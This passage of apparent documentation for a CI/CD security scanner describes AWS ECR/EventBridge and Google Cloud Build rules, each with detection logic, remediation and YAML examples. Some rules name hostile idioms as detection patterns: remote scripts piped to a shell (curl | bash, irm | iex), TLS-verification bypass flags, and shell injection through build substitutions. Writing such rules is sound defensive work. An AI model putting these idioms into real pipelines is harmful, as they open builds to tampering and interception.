  • Some teams use a static prefix plus a CI-controlled tail (node: { pool: build-${DRONE_REPO_NAME} }) to share a runner pool across repos. DRONE_REPO_NAME is set by the server, not the pusher, so it isn't on the tainted list, but if your team has its own conventions for trusted Drone vars, suppress on the specific pipeline name.

Source: DR-011 in the Drone CI provider.

EB-000: EventBridge API access failed INFO

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. See AWS provider documentation for the rule's detection mechanism.

Recommendation. See AWS provider documentation for the recommended remediation.

Source: EB-000 in the AWS provider.

EB-001: No EventBridge rule for CodePipeline failure notifications MEDIUM

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. Pipeline failure events are emitted to EventBridge automatically; the missing piece is a rule that pipes them to somewhere a human reads (SNS, Slack, PagerDuty). Without it, failures only surface via the CodePipeline console, which no one watches.

Recommendation. Create an EventBridge rule matching detail-type: 'CodePipeline Pipeline Execution State Change' and state: FAILED, and point it at an SNS topic or chat webhook. Without it, pipeline failures during an incident (a compromise triggering rollback, for example) go unnoticed.
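
A CloudFormation sketch of such a rule, assuming an SNS topic as the destination (resource names are illustrative; the topic also needs a resource policy allowing events.amazonaws.com to publish, omitted here):

```yaml
Resources:
  PipelineFailureTopic:
    Type: AWS::SNS::Topic
  PipelineFailureRule:
    Type: AWS::Events::Rule
    Properties:
      # Matches only failed pipeline executions.
      EventPattern:
        source: [aws.codepipeline]
        detail-type: ['CodePipeline Pipeline Execution State Change']
        detail:
          state: [FAILED]
      Targets:
        - Id: notify-oncall
          Arn: !Ref PipelineFailureTopic   # Ref on an SNS topic yields its ARN
```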

Source: EB-001 in the AWS provider.

EB-002: EventBridge rule has a wildcard target ARN HIGH

Evidences: CICD-SEC-8 Ungoverned Usage of 3rd-Party Services.

How this is detected. Wildcard target ARNs (e.g. arn:aws:lambda:us-east-1:123456789012:function:*) match every resource that fits the prefix. This is rarely intentional (usually a copy-paste from a more permissive resource ARN) and means the rule fans out to a much larger set of consumers than the author meant.

Recommendation. Replace wildcard target ARNs with specific resource ARNs. EventBridge targets with * route events to any resource that matches the prefix, frequently triggering unintended Lambda invocations or SNS sends.

Source: EB-002 in the AWS provider.

ECR-000: ECR API access failed INFO

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. See AWS provider documentation for the rule's detection mechanism.

Recommendation. See AWS provider documentation for the recommended remediation.

Source: ECR-000 in the AWS provider.

ECR-001: Image scanning on push not enabled HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. scan-on-push runs a CVE check against the image's OS package layers at the moment it lands in ECR. Without it, an image with a known CVE deploys silently. The ECR basic scanner is free; ECR-007 covers the Inspector v2 enhanced scanner that adds language-ecosystem CVEs (npm, pip, gem).

Recommendation. Enable imageScanningConfiguration.scanOnPush on the repository. Consider also enabling Amazon Inspector continuous scanning for ongoing CVE detection against images already in the registry.
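
A CloudFormation sketch of the passing configuration (repository name is illustrative):

```yaml
Resources:
  AppImages:
    Type: AWS::ECR::Repository
    Properties:
      RepositoryName: my-app
      # Basic CVE scan of OS package layers on every push;
      # ECR-007 covers the Inspector v2 enhanced scanner.
      ImageScanningConfiguration:
        ScanOnPush: true
```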

Source: ECR-001 in the AWS provider.

ECR-002: Image tags are mutable HIGH

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Mutable tags mean :latest, :v1.0, and :stable can be re-pushed silently: the same tag points to different image content over time. Pinning by digest (sha256:...) in deployment manifests is the only durable reference; IMMUTABLE on the repo enforces the property registry-side so a forgotten digest reference doesn't drift.

Recommendation. Set imageTagMutability=IMMUTABLE on the repository. Reference images by digest (sha256:...) in deployment manifests for strongest immutability guarantees.

Source: ECR-002 in the AWS provider.

ECR-003: Repository policy allows public access CRITICAL

Evidences: CICD-SEC-8 Ungoverned Usage of 3rd-Party Services.

How this is detected. A wildcard-principal repo policy means anyone on the internet can pull images. That is sometimes intentional (a publicly distributed base image), but it should be a deliberate exposure, typically via the ECR Public registry rather than a private repo with a public policy. The default for build-output images should never be public.

Recommendation. Remove wildcard principals from the repository policy. Grant access only to specific AWS account IDs or IAM principals that require it.

Source: ECR-003 in the AWS provider.

ECR-004: No lifecycle policy configured LOW

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Without a lifecycle policy, untagged images and old tagged images accumulate indefinitely. Stale images keep CVE attack surface available: anyone who can pull from the repo can pull the old, unpatched version even after a newer build has shipped. Lifecycle expiry is the housekeeper that closes that window.

Recommendation. Add a lifecycle policy that expires untagged images after a short period (e.g. 7 days) and limits the number of tagged images retained, reducing exposure to images with known CVEs.
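
A CloudFormation sketch of a minimal lifecycle policy (repository name and retention numbers are illustrative):

```yaml
Resources:
  AppImages:
    Type: AWS::ECR::Repository
    Properties:
      RepositoryName: my-app
      LifecyclePolicy:
        # The policy body is a JSON document embedded as a string.
        LifecyclePolicyText: |
          {
            "rules": [{
              "rulePriority": 1,
              "description": "Expire untagged images after 7 days",
              "selection": {
                "tagStatus": "untagged",
                "countType": "sinceImagePushed",
                "countUnit": "days",
                "countNumber": 7
              },
              "action": {"type": "expire"}
            }]
          }
```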

Source: ECR-004 in the AWS provider.

ECR-005: Repository encrypted with AES256 rather than KMS CMK MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Same shape as CP-002 / CWL-002 / CCM-002: AES256 (the AWS-managed default) gives confidentiality at rest but no key-policy or CloudTrail Decrypt-event story. Container images are arguably sensitive intellectual property; the same key-policy + audit shape as build outputs in S3 is warranted.

Recommendation. Set encryptionType=KMS with a customer-managed key ARN.

Source: ECR-005 in the AWS provider.

ECR-006: ECR pull-through cache rule uses an untrusted upstream HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. AWS supports pull-through cache for ECR Public, Quay, K8s, GitHub Container Registry, GitLab, and Docker Hub. A rule pointing at registry-1.docker.io without an authenticated credential silently caches whatever the public namespace resolves to.

Recommendation. Scope pull-through cache rules to AWS-trusted registries (ECR Public, Quay.io with authentication, or a vetted private registry). Avoid wildcard or unauthenticated upstreams; a malicious image there gets cached into your account registry on first pull.

Source: ECR-006 in the AWS provider.

ECR-007: Inspector v2 enhanced scanning disabled for ECR MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. ECR-001's basic on-push scan covers OS-level packages (the apt / yum / apk lineage). Most production CVE risk is in language ecosystems (npm, pip, gem, mvn), which the basic scanner ignores. Inspector v2 enhanced scanning closes that gap and runs continuously, so a CVE published two weeks after a build still surfaces against the deployed image.

Recommendation. Enable Amazon Inspector v2 for the ECR scan type on this account. Basic ECR scanning on-push only covers OS packages; Inspector v2 enhanced scanning adds language-ecosystem CVEs and runs continuously as new vulnerabilities are published.

Source: ECR-007 in the AWS provider.

GCB-001: Cloud Build step image not pinned by digest HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Bare references (gcr.io/cloud-builders/docker) are treated as :latest by Cloud Build. Tag-only references (:20, :latest) count as unpinned. Only @sha256:… suffixes pass.

Recommendation. Pin every steps[].name image to an @sha256:<digest> suffix. gcr.io/cloud-builders/docker:latest is mutable; Google publishes new builder images frequently and the next build would pull whatever is current. Resolve the digest with gcloud artifacts docker images describe <ref> --format='value(image_summary.digest)' and pin it.
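
The passing shape in cloudbuild.yaml (the digest below is a placeholder; resolve the real one with the gcloud command above):

```yaml
steps:
  # Digest-pinned: the step runs exactly this builder image even if
  # the upstream tag is re-pushed. Digest is illustrative.
  - name: gcr.io/cloud-builders/docker@sha256:0000000000000000000000000000000000000000000000000000000000000000
    args: [build, -t, 'gcr.io/$PROJECT_ID/app:$COMMIT_SHA', '.']
```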

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: GCB-001 in the Cloud Build provider.

GCB-002: Cloud Build uses the default service account HIGH

Evidences: CICD-SEC-2 Inadequate Identity and Access Management.

How this is detected. The default Cloud Build service account historically held roles/cloudbuild.builds.builder plus project-level editor in many organisations. Even under the GCP April-2024 default-identity change, the default SA is still broader than what a single pipeline needs. Explicit serviceAccount: is required to pass.

Recommendation. Create a dedicated service account for the build, grant it only the roles the pipeline actually needs (roles/artifactregistry.writer, roles/storage.objectCreator for artifact upload, etc.), and set serviceAccount: projects/<PROJECT>/serviceAccounts/<NAME>@.... Leaving it unset falls back to the default Cloud Build SA, which accumulates roles over a project's lifetime and is routinely granted roles/editor.

Source: GCB-002 in the Cloud Build provider.

GCB-003: Secret Manager value referenced in step args HIGH

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Detection patterns: literal projects/<n>/secrets/<name>/versions/... URIs, gcloud secrets versions access shell invocations, and $(gcloud secrets …) command substitutions in step args or entrypoint.

Recommendation. Map the secret under availableSecrets.secretManager[] with an env: alias, then reference it from each step via secretEnv: [ALIAS]. Avoid inline gcloud secrets versions access in args; the resolved plaintext lands in build logs.
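
A sketch of the recommended wiring, assuming a secret named api-token (project, secret name, and URL are illustrative):

```yaml
availableSecrets:
  secretManager:
    # Pin the version number rather than 'latest' (see GCB-007).
    - versionName: projects/my-project/secrets/api-token/versions/7
      env: API_TOKEN
steps:
  - name: gcr.io/cloud-builders/curl
    secretEnv: [API_TOKEN]
    entrypoint: bash
    args:
      - -c
      # $$ tells Cloud Build to leave expansion to bash, so the
      # plaintext never appears in the rendered config.
      - 'curl -H "Authorization: Bearer $$API_TOKEN" https://deploy.example.com/hook'
```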

Source: GCB-003 in the Cloud Build provider.

GCB-004: dynamicSubstitutions on with user substitutions in step args HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. A leading underscore is Cloud Build's naming convention for user substitutions; they are editable via the build trigger UI, gcloud builds submit --substitutions, and the REST API. Built-in substitutions ($PROJECT_ID, $COMMIT_SHA, $BUILD_ID) are derived from the trigger event and are not treated as user-controlled by this rule.

Recommendation. Either disable options.dynamicSubstitutions (it defaults to false) or move user substitutions ($_FOO) out of step args: pass them through env: and reference them inside a shell script the builder runs. Dynamic substitution re-evaluates bash syntax after variable expansion, giving trigger-config editors a script-injection channel.
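
A sketch of the env: indirection, with an illustrative $_DEPLOY_ENV substitution and a checked-in deploy script:

```yaml
steps:
  - name: gcr.io/cloud-builders/gcloud
    entrypoint: bash
    # The substitution lands in an environment variable, not in
    # shell text, so its metacharacters are never re-parsed.
    env:
      - 'DEPLOY_ENV=$_DEPLOY_ENV'
    # $$ defers expansion to bash; quoting keeps the value one word.
    args: [-c, './scripts/deploy.sh "$$DEPLOY_ENV"']
```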

Source: GCB-004 in the Cloud Build provider.

GCB-005: Build timeout unset or excessive LOW 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Cloud Build's default 10-minute timeout applies silently when timeout: is absent. Accepted format is <N>s (seconds); <N>m/<N>h forms are a gcloud convenience and are treated as malformed by the API.

Recommendation. Declare an explicit timeout: at the top of cloudbuild.yaml bounded to the build's realistic worst case (e.g. 1800s for most container builds). Explicit bounds shorten the window a compromised build can spend on a shared worker and flag regressions when a legitimate step slows down.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: GCB-005 in the Cloud Build provider.

GCB-006: Dangerous shell idiom (eval, sh -c variable, backtick exec) HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Complements GCB-004 (dynamicSubstitutions + user substitution in args). GCB-006 fires on intrinsically risky shell idioms (eval, sh -c "$X", backtick exec) regardless of whether the substitution source is currently trusted.

Recommendation. Replace eval "$VAR" / sh -c "$VAR" / backtick exec with direct command invocation. Validate or allow-list any value that must feed a dynamic command at the boundary. In Cloud Build these idioms typically appear in args: [-c, ...] entries under a bash entrypoint.

Known false positives.

  • eval "$(ssh-agent -s)" and similar eval "$(<literal-tool>)" bootstrap idioms are intentionally NOT flagged: the substituted command is literal; only its output is eval'd.

Source: GCB-006 in the Cloud Build provider.

GCB-007: availableSecrets references versions/latest MEDIUM 🔧 fix

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. versions/latest is documented as a rolling alias. A build run on Monday and a re-run on Tuesday can consume different secret bodies without any change to cloudbuild.yaml, breaking the reproducibility invariant that pinning protects.

Recommendation. Pin each availableSecrets.secretManager[].versionName to a specific version number (.../versions/7) rather than latest. Rotate by updating the number when a new version is promoted, not by silently publishing a new version that the next build pulls.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: GCB-007 in the Cloud Build provider.

GCB-008: No vulnerability scanning step in Cloud Build pipeline MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. The detector matches tool names anywhere in the document: step images, args, or entrypoint strings. Container Analysis API scanning configured at the project level counts as a compensating control but is out of scope for this YAML-only check; if you rely on it, suppress this rule via --checks.

Recommendation. Add a step that runs a vulnerability scanner: trivy, grype, snyk test, npm audit, pip-audit, osv-scanner, or govulncheck. In Cloud Build this typically looks like a step with name: aquasec/trivy or an entrypoint: bash step that invokes trivy image / grype <ref> on the built image.
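
A sketch of the build-push-scan sequence (image refs are illustrative; in a real pipeline, pin aquasec/trivy by digest per GCB-001):

```yaml
steps:
  - name: gcr.io/cloud-builders/docker
    args: [build, -t, 'gcr.io/$PROJECT_ID/app:$COMMIT_SHA', '.']
  - name: gcr.io/cloud-builders/docker
    args: [push, 'gcr.io/$PROJECT_ID/app:$COMMIT_SHA']
  # Scan the pushed ref; a non-zero exit fails the build on findings.
  - name: aquasec/trivy
    args: [image, '--exit-code=1', '--severity=HIGH,CRITICAL', 'gcr.io/$PROJECT_ID/app:$COMMIT_SHA']
```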

Source: GCB-008 in the Cloud Build provider.

GCB-009: Artifacts not signed (no cosign / sigstore step) MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. The rule passes silently when the pipeline does not appear to produce artifacts (no docker push / gcloud run deploy / kubectl apply / etc. in any step). The detector matches cosign, sigstore, slsa-framework, and notation.

Recommendation. Add a signing step before images: is resolved; for example, a step with name: gcr.io/projectsigstore/cosign that runs cosign sign --yes <registry>/<repo>@<digest>. Pair with an attestation step (cosign attest --predicate sbom.json --type cyclonedx) so consumers can verify both the signature and the build provenance.
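
A sketch of such a signing step (registry path and digest are placeholders; cosign key or keyless-identity setup is environment-specific and omitted):

```yaml
steps:
  # Sign by digest, never by tag: the signature then covers exactly
  # the bytes that were pushed.
  - name: gcr.io/projectsigstore/cosign
    args:
      - sign
      - --yes
      - 'us-docker.pkg.dev/$PROJECT_ID/containers/app@sha256:<digest>'
```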

Source: GCB-009 in the Cloud Build provider.

GCB-010: Remote script piped to shell interpreter HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detects curl | bash, wget | sh, bash -c "$(curl …)", inline python -c urllib.urlopen, curl > x.sh && bash x.sh, and PowerShell irm | iex idioms. Vendor-trusted hosts (rustup.rs, get.docker.com, sdk.cloud.google.com, …) are still flagged at HIGH but the hit carries a vendor_trusted marker so dashboards can stratify known-vendor installers from arbitrary attacker URLs.

Recommendation. Download the script to a file, verify its checksum, then execute it. Better yet, vendor the script into the repository and invoke it from the checkout; removing the network fetch removes the attacker-controllable content entirely.

Source: GCB-010 in the Cloud Build provider.

GCB-011: TLS / certificate verification bypass HIGH 🔧 fix

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Covers curl -k / wget --no-check-certificate, git config http.sslVerify false, NODE_TLS_REJECT_UNAUTHORIZED=0, npm config set strict-ssl false, PYTHONHTTPSVERIFY=0, GOINSECURE=, helm --insecure-skip-tls-verify, kubectl --insecure-skip-tls-verify, and ssh -o StrictHostKeyChecking=no.

Recommendation. Fix the underlying certificate issue, install the correct CA bundle into the step image, or point the tool at a mirror that presents a valid chain. Disabling verification trades a build error for a silent MITM window.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: GCB-011 in the Cloud Build provider.

GCB-012: Credential-shaped literal in pipeline body CRITICAL

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Complements GCB-003 (inline gcloud secrets versions access) and GCB-007 (/versions/latest alias). This rule runs the shared credential-shape catalog against every string in the YAML: AWS keys, GitHub PATs, Slack webhooks, JWTs, PEM private key blocks, and any user-registered --secret-pattern regex. Known placeholders like EXAMPLE/CHANGEME are already filtered upstream so fixtures and docs don't false-match.

Recommendation. Rotate the exposed credential immediately. Move the value to availableSecrets.secretManager and reference it via secretEnv: so the plaintext never lands in the YAML or the build logs. For cloud access prefer workload-identity federation over long-lived keys.

Source: GCB-012 in the Cloud Build provider.

GCB-013: Package install bypasses registry integrity (git / path / tarball) MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Complements GCB-012 (literal secrets) and GCB-010 (curl-pipe). Where those catch attacker content at fetch time, this rule catches installs that silently bypass the lockfile/registry integrity model: the build appears reproducible, but the source of truth is whatever the git ref / filesystem / tarball URL served most recently.

Recommendation. Pin git dependencies to a commit SHA (pip install git+https://…/repo@<sha>, cargo install --git … --rev <sha>). Publish private packages to Artifact Registry (or another internal registry) instead of installing from a filesystem path or tarball URL.

Source: GCB-013 in the Cloud Build provider.

GCB-014: Build logging disabled (options.logging: NONE) HIGH 🔧 fix

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. options.logging defaults to CLOUD_LOGGING_ONLY when omitted, which passes. Only the explicit NONE value (case-insensitive) trips this rule. GCS_ONLY / LEGACY pass; they persist logs, just to a different destination.

Recommendation. Remove the logging: NONE override, or replace it with CLOUD_LOGGING_ONLY / GCS_ONLY, so every step's stdout, stderr, and exit code is persisted. Loss of logs is a detection-and-response black hole; the storage cost is measured in cents.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: GCB-014 in the Cloud Build provider.

GCB-015: SBOM not produced (no CycloneDX / syft / Trivy-SBOM step) MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Complements GCB-009 (signing) and GCB-008 (vuln scanning). Without an SBOM, downstream consumers cannot audit the exact dependency set shipped in a Cloud Build image, delaying vulnerability response when a transitive dep is disclosed. Pairs naturally with cosign attest --type cyclonedx in a follow-up step.

Recommendation. Add an SBOM generation step (syft <image> -o cyclonedx-json or trivy image --format cyclonedx) and publish the resulting document alongside the image, typically via a cosign attestation so the SBOM travels with the artifact.

Source: GCB-015 in the Cloud Build provider.

GCB-016: Step dir field contains parent-directory escape (..) MEDIUM

Evidences: CICD-SEC-4 Poisoned Pipeline Execution, CICD-SEC-7 Insecure System Configuration.

How this is detected. Cloud Build doesn't sandbox the dir: value beyond a join against /workspace. dir: ../etc resolves to /etc inside the builder container, which is rarely the intent. The check fires on any literal .. segment; single-dot ./ and absolute paths are fine.

Recommendation. Replace .. traversals in dir: with absolute paths rooted under /workspace (e.g. dir: /workspace/sub) or split the work across multiple steps that each set dir: to an exact subdirectory. The Cloud Build worker starts each step with the workspace mounted at /workspace; a .. escape from there reaches the builder image's root filesystem and any credentials the image carries.

Source: GCB-016 in the Cloud Build provider.

GCB-017: Image-producing build does not request SLSA provenance MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse, CICD-SEC-9 Improper Artifact Integrity Validation, CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. SLSA Build Level 2 requires that the build platform produce signed provenance; Cloud Build's requestedVerifyOption: VERIFIED is the documented way to opt in. The check is silent when the build does not produce an image (no top-level images: and no docker push / gcloud run deploy style steps); for those, signing and provenance aren't applicable.

Recommendation. Set options.requestedVerifyOption: VERIFIED on builds that publish container images. Cloud Build then emits a signed SLSA provenance attestation alongside the image, which downstream verifiers (Binary Authorization, cosign verify-attestation, gcloud artifacts docker images describe) can use to check that an image was built by the configured pipeline rather than smuggled in from elsewhere.

Source: GCB-017 in the Cloud Build provider.

GCB-018: Legacy KMS secrets block in use (prefer availableSecrets / Secret Manager) MEDIUM

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Cloud Build supports two secret-injection mechanisms. The older secrets: block carries KMS-encrypted ciphertext directly in the YAML; the cipher is decrypted at build time if the build's service account has cloudkms.cryptoKeyDecrypter on the key. The newer availableSecrets block references Secret Manager versions by URL, which is the documented modern approach. The legacy form still works, but rotating a value means re-encrypting and committing a new ciphertext.

Recommendation. Migrate from the top-level secrets: block (KMS-encrypted values stored inline in the YAML) to availableSecrets + Secret Manager. Replace each secrets[].secretEnv mapping with a versionName reference under availableSecrets.secretManager. Secret Manager rotates without re-encrypting and re-committing the YAML, scopes access via IAM rather than the KMS key's IAM, and produces an explicit audit log entry on every read.
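
A before / after sketch of the migration (key ring, secret name, and ciphertext are illustrative):

```yaml
# Legacy shape the rule flags: ciphertext committed in the YAML.
# secrets:
#   - kmsKeyName: projects/my-project/locations/global/keyRings/ci/cryptoKeys/build
#     secretEnv:
#       API_TOKEN: CiQA...base64-ciphertext...
# Modern shape: reference a Secret Manager version instead.
availableSecrets:
  secretManager:
    - versionName: projects/my-project/secrets/api-token/versions/7
      env: API_TOKEN
steps:
  - name: gcr.io/cloud-builders/gcloud
    secretEnv: [API_TOKEN]
    entrypoint: bash
    args: [-c, './scripts/use-token.sh']
```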

Known false positives.

  • Builds that use both forms during a migration trip the rule on the legacy block. That's intentional; finishing the migration is the fix.

Source: GCB-018 in the Cloud Build provider.

GCB-019: Shell entrypoint inlines a user substitution into args HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Distinct from GCB-004, which fires only when options.dynamicSubstitutions: true re-evaluates bash syntax after expansion. GCB-019 fires whenever a step uses a shell as its entrypoint AND a $_USER_VAR token lands inside args. Cloud Build expands the substitution before the step runs, and the shell then interprets any metacharacters the substitution carried: straight command injection through trigger configuration.

Recommendation. Pass user substitutions through env: (or secretEnv: for sensitive values) and reference them inside a checked-in shell script rather than splicing them directly into args. If the step truly needs to invoke shell logic inline, switch the entrypoint to the underlying tool (docker, gcloud, gsutil) and let the tool see the substitution as an argument, not as shell text.
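
A sketch of the tool-as-entrypoint alternative, with an illustrative $_BUCKET substitution:

```yaml
steps:
  # gsutil receives the substitution as a plain argument; no shell
  # ever parses it, so metacharacters in $_BUCKET cannot become
  # commands.
  - name: gcr.io/cloud-builders/gsutil
    args: [cp, artifact.tgz, 'gs://$_BUCKET/artifact.tgz']
```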

Source: GCB-019 in the Cloud Build provider.

GCB-020: serviceAccount points at the default Cloud Build service account HIGH

Evidences: CICD-SEC-2 Inadequate Identity and Access Management.

How this is detected. Complements GCB-002, which only fires when serviceAccount: is unset. This rule fires when an explicit value is set but still resolves to the project default, typically the email shape <digits>@cloudbuild.gserviceaccount.com, optionally wrapped in the projects/<id>/serviceAccounts/... URI form. The April-2024 GCP default-identity change kept the same SA shape; the broad-permissions concern remains.

Recommendation. Don't bind the build to <project-number>@cloudbuild.gserviceaccount.com. The default Cloud Build SA accumulates roles over a project's lifetime (commonly roles/editor or broad Artifact Registry / Secret Manager access). Create a dedicated SA per pipeline, grant only the roles the build actually needs, and reference it by its bespoke email (<name>@<project>.iam.gserviceaccount.com). Revoking a compromised pipeline then doesn't unbind every other build in the project.

Known false positives.

  • Single-pipeline GCP projects where the default SA's roles are actively scoped down. Rare in practice; create a named SA anyway so the audit log stays unambiguous about which pipeline made each API call.

Source: GCB-020 in the Cloud Build provider.

GCB-021: No private worker pool, build runs on the shared default pool MEDIUM 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Cloud Build runs in a shared Google-managed pool by default. Switching to a private worker pool is the prerequisite for every other network-perimeter control: egress restriction to specific peered networks, ingress blocking of public endpoints, and traffic interoperation with VPC Service Controls. Both options.pool.name and the legacy options.workerPool field are accepted.

Recommendation. Set options.pool.name: projects/<PROJECT>/locations/<REGION>/workerPools/<NAME> to bind the build to a private worker pool inside your VPC. The default pool runs on a shared Google-managed network with public-internet egress and ingress paths Google chooses, which makes egress filtering, VPC-SC perimeters, and source-IP allowlists on internal endpoints impossible. A private pool also gives you the option to disable external IPs and to log the build's network activity through your own VPC flow logs.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • OSS / sample / one-off builds that legitimately have no private network and no internal endpoints to protect. Suppress with a brief .pipelinecheckignore rationale rather than disabling at the catalog level.

Source: GCB-021 in the Cloud Build provider.

GCB-022: options.substitutionOption set to ALLOW_LOOSE LOW 🔧 fix

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Cloud Build accepts two values for options.substitutionOption: MUST_MATCH (default, any undefined $_VAR reference fails the build at parse time) and ALLOW_LOOSE (undefined references silently expand to ""). The default is the safer setting; this rule only fires on the explicit ALLOW_LOOSE opt-in. Builds that genuinely depend on optional substitutions should pass them through substitutions: defaults, not rely on silent empty-string fallback.

Recommendation. Drop options.substitutionOption (the default is MUST_MATCH) or set it explicitly to MUST_MATCH. ALLOW_LOOSE makes Cloud Build expand undefined substitutions to the empty string instead of failing the build. That papers over typos ($_REGON instead of $_REGION), masks unset variables that should have tripped review, and, combined with dynamicSubstitutions: true (GCB-004), widens the command-injection surface by letting attacker-controlled substitution tokens collapse to empty strings inside shell commands.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Migration scenarios where a long-running pipeline pre-dates MUST_MATCH and the operator needs ALLOW_LOOSE temporarily. Suppress with a brief .pipelinecheckignore rationale and an expires: date so the waiver doesn't outlive the migration.

Source: GCB-022 in the Cloud Build provider.

GCB-023: Step references a user substitution not declared in substitutions: MEDIUM

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Walks every step's args: / entrypoint: / env: / dir: / id: / waitFor: for $_NAME tokens (Cloud Build's user-substitution syntax is leading underscore + uppercase / digits / underscore) and cross-references against the top-level substitutions: mapping. Built-in substitutions ($PROJECT_ID, $REPO_NAME, $BRANCH_NAME, $TAG_NAME, $COMMIT_SHA, $SHORT_SHA, $REVISION_ID, $BUILD_ID, $LOCATION, $TRIGGER_NAME, $_HEAD_*, $_BASE_*, $_PR_NUMBER and the $_HEAD_REPO_URL family) are Cloud Build server-set and don't appear in substitutions:; the rule allow-lists them so they don't false-positive.

Recommendation. Add an entry for every $_USER_VAR referenced anywhere in the build to the top-level substitutions: block, either with a sensible default or with an empty string if the trigger always supplies the value. Cloud Build's default options.substitutionOption: MUST_MATCH then fails the build at parse time on undeclared references (catching typos at the gate). With the looser ALLOW_LOOSE opt-in (GCB-022) undeclared references silently expand to the empty string, which masks the bug and quietly broadens any shell command that interpolates the value.
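
A sketch of the declared-substitutions shape (variable names and defaults are illustrative):

```yaml
# MUST_MATCH (the default) rejects any undeclared $_VAR at parse
# time, so a typo fails the build instead of expanding to "".
substitutions:
  _DEPLOY_ENV: staging   # overridable default
  _SERVICE: ''           # the trigger always supplies this one
steps:
  - name: gcr.io/cloud-builders/gcloud
    args: [run, deploy, '$_SERVICE', '--region=us-central1', '--set-env-vars=ENV=$_DEPLOY_ENV']
```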

Source: GCB-023 in the Cloud Build provider.

GCB-024: Build pushes Docker images but top-level images: is empty LOW

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Walks step args / entrypoint / cmd looking for docker push (or the buildx imagetools push variant) invocations. When the build has at least one such step but the top-level images: field is missing or empty, the rule fires. Steps that build and push via the gcr.io/cloud-builders/docker builder image are the common case; --push flags on buildx build are also detected. kaniko and buildah push idioms aren't currently detected; those are different builder images entirely.

Recommendation. Add every image the build produces to the top-level images: array (e.g. images: ['gcr.io/$PROJECT_ID/myapp:$COMMIT_SHA']). Cloud Build then verifies the push succeeded before marking the build SUCCESS, records the image in the build's metadata for provenance / Binary Authorization attestation, and surfaces the image in the builds.list --image query. Without it, a push that happens inside a step is invisible to Cloud Build's tracking layer even though the image still lands in the registry.
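A sketch of the pattern (the image name is hypothetical):

```yaml
steps:
  - name: gcr.io/cloud-builders/docker
    args: ['build', '-t', 'gcr.io/$PROJECT_ID/myapp:$COMMIT_SHA', '.']
images:
  - 'gcr.io/$PROJECT_ID/myapp:$COMMIT_SHA'   # Cloud Build pushes, verifies, and records this image
```

With images: declared, Cloud Build performs the push itself after the steps complete, so a separate docker push step becomes unnecessary.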

Known false positives.

  • Multi-stage builds where one step pushes an intermediate image to a private cache registry and the final stage pushes the production artifact (which IS in images:) would trip this rule on the cache push. Suppress with --ignore-file when this matches.

Source: GCB-024 in the Cloud Build provider.

GCB-025: Build has no tags for audit / discoverability LOW

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. Cloud Build tags are user-defined labels attached to a build. They appear in the build's metadata (tags: field on the Build resource), in every Cloud Logging audit event for the build, and as a filter argument to gcloud builds list --filter='tags:<value>'. The rule fires when the top-level tags: field is missing or empty. Substitution-bearing tags ($BRANCH_NAME, $COMMIT_SHA) count as populated, since Cloud Build expands them at submission time.

Recommendation. Add a top-level tags: array to every cloudbuild.yaml: at minimum, an environment tag (prod / staging / dev) and a service tag (backend / frontend / infra). Cloud Build records tags in the build metadata and Cloud Logging entries, so post-incident triage of "which build emitted this?" becomes a single gcloud builds list --filter='tags:prod' query. Without tags, builds are discoverable only by build id, and the id is a UUID with no signal.
